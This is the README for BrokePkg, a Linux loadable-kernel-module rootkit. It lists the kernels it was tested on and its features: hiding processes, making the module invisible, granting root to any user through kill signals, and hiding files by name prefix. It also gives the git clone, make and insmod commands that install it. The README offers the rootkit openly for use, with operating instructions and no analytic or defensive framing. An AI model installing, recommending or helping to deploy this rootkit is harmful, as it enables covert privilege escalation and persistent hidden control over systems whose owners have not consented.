BrokePkg
Brokepkg is a LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x and ARM64, with suport after kernel 5.7, without kallsyms_lookup_name.
Tested on
- Kali linux: 5.10.0-kali3-amd64
- Linux mint: 4.19.0-8-amd64
Features
- Hide/unhide any process by sending a signal 63;
- Sending a signal 31(to any pid) makes the module become (in)visible;
- Sending a signal 64(to any pid) makes the given user become root;
- Files or directories starting with the PREFIX become invisible;
Install
sudo apt install build-essential libncurses-dev linux-headers-$(uname -r)
git clone https://github.com/R3tr074/brokepkg
cd brokepkg
make
sudo insmod brokepkg.koUninstall
Remove brokepkg invisibility to uninstall him
kill -31 0Then remove the module
sudo rmmod brokepkg